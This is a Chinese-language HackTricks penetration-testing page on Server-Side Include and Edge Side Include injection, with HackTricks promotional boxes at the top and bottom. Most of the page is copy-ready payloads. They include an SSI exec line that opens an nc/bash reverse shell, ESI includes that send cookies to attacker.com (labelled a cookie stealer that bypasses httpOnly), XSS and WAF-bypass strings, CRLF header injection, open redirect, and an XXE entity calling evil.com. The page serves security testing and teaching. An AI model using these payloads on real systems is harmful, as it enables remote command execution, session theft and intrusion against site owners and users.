hacktricks/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md

# 服务器端包含/边缘端包含注入

<details>

<summary><strong>从零到英雄学习AWS黑客技术，参加</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**

</details>

## 服务器端包含基础信息

SSI（服务器端包含）是**放置在HTML页面中，在服务器上评估**的指令，当页面被提供服务时。它们让你**向现有HTML页面添加动态生成的内容**，而无需通过CGI程序或其他动态技术来提供整个页面。\
例如，你可能会在现有的HTML页面中放置一个指令，如：

`<!--#echo var="DATE_LOCAL" -->`

当页面被提供服务时，这个片段将被评估并替换为它的值：

`Tuesday, 15-Jan-2013 19:28:54 EST`

决定何时使用SSI，何时让您的页面完全由某个程序生成，通常是一个关于页面有多少是静态的，以及每次提供服务时需要重新计算多少的问题。SSI是添加小信息片段的好方法，比如上面显示的当前时间。但是如果您的页面的大部分在提供服务时被生成，您需要寻找其他解决方案。（定义取自[这里](https://httpd.apache.org/docs/current/howto/ssi.html)）。

如果Web应用程序使用扩展名为\*\* `.shtml`、`.shtm` 或 `.stm`\*\*的文件，您可以推断出SSI的存在，但这并不是唯一的情况。

典型的SSI表达式格式如下：
```
<!--#directive param="value" -->
```
### 检查
```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

```
## 边缘端包含（Edge Side Inclusion）

缓存信息或动态应用程序存在一个问题，因为部分内容在下次检索时可能会**变化**。这就是**ESI**的用途，通过使用ESI标签来指示**需要生成的动态内容**，然后再发送缓存版本。\
如果**攻击者**能够在缓存内容中**注入一个ESI标签**，那么他就能够在文档发送给用户之前**注入任意内容**。

### ESI 检测

以下**响应头**表明服务器正在使用ESI：
```
Surrogate-Control: content="ESI/1.0"
```
如果找不到这个头部，服务器**可能仍在使用ESI**。\
**盲目利用方法也可以使用**，因为请求应该会到达攻击者的服务器：
```javascript
// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>
```
### ESI 漏洞利用

[GoSecure](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) 创建了一个表格，帮助我们理解针对不同支持 ESI 的软件，根据其支持的功能，我们可以尝试的可能攻击。首先，让我们解释一下下表列名的含义：

* **Includes**: 支持 `<esi:includes>` 指令
* **Vars**: 支持 `<esi:vars>` 指令。用于绕过 XSS 过滤器
* **Cookie**: 文档 cookies 可以被 ESI 引擎访问
* **Upstream Headers Required**: 代理应用程序不会处理 ESI 语句，除非上游应用程序提供了头部信息
* **Host Allowlist**: 在这种情况下，只能从允许的服务器主机进行 ESI 包含，例如，SSRF 只能针对这些主机进行

|         **软件**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
| :----------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
|            Squid3            |      是     |    是   |     是     |              是              |         否         |
|         Varnish Cache        |      是     |    否    |      否     |              是              |         是        |
|            Fastly            |      是     |    否    |      否     |               否              |         是        |
| Akamai ESI Test Server (ETS) |      是     |    是   |     是     |               否              |         否         |
|          NodeJS esi          |      是     |    是   |     是     |               否              |         否         |
|         NodeJS nodesi        |      是     |    否    |      否     |               否              |      可选      |

#### XSS

以下 ESI 指令将在服务器的响应中加载任意文件
```markup
<esi:include src=http://attacker.com/xss.html>
```
文件 _http://attacker.com/xss.html_ 可能包含像 `<script>alert(1)</script>` 这样的XSS载荷

#### 绕过客户端XSS保护
```markup
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
```
#### 偷取 Cookie

* 远程偷取 cookie
```markup
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```
* 通过在响应中反射来窃取带有 XSS 的 HTTP\_ONLY cookie：
```bash
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
```
* 通过反射 cookies 实现完全账户接管

#### 私有本地文件

不要将此与“本地文件包含”混淆：
```markup
<esi:include src="secret.txt">
```
#### CRLF
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### 开放重定向

以下操作将在响应中添加一个 `Location` 头
```bash
<!--esi $add_header('Location','http://attacker.com') -->
```
#### 添加头部

* 在强制请求中添加头部
```html
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```
* 在响应中添加头部（用于绕过带有XSS的响应中的"Content-Type: text/json"）
```bash
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
```
#### 在添加头部中的CRLF（**CVE-2019-2438)**
```markup
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```
#### Akamai 调试

这将发送响应中包含的调试信息：
```markup
<esi:debug/>
```
### ESI + XSLT = XXE

也可以通过指定 `xslt` 值给 _dca_ 参数，添加基于\*\* **\_**可扩展样式表语言转换 (XSLT)**\_** \*\*的 ESI 包含。以下包含将导致HTTP代理请求XML和XSLT文件。然后使用XSLT文件过滤XML文件。这个XML文件可以用来执行 _XML外部实体 (XXE)_ 攻击。这允许攻击者执行SSRF攻击，这并不是非常有用，因为这必须通过ESI包含来执行，而ESI包含本身就是一个SSRF向量。由于底层库（Xalan）不支持外部DTD，因此不解析外部DTD。这意味着我们无法提取本地文件。
```markup
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
XSLT文件：
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```
检查XSLT页面：

{% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-language-transformations.md](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %}

### 参考资料

* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)

## 暴力破解检测列表

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}

<details>

<summary><strong>通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>从零开始学习AWS黑客攻击！</strong></summary>

支持HackTricks的其他方式：

* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**

</details>